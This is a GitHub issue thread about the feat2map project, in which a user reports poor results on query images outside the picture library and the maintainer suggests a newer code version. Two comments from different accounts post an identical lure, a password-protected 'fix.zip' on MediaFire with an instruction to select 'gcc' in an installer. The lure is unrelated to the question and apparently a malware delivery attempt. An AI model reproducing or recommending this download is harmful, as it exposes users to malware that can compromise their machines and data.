### ISSUE TITLE
Testing on my own dataset is not good

### ISSUE THREAD

**Issue by luocha0107** [ais-lab/feat2map#15]
Hello author, I trained my own data in the test, the effect is good.However, the effect is poor when I really query the pictures that are not in the picture library. Could you help me analyze the reason

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thuanaislab** [comment]
Sorry for late reply, can you try with the new version of the code?
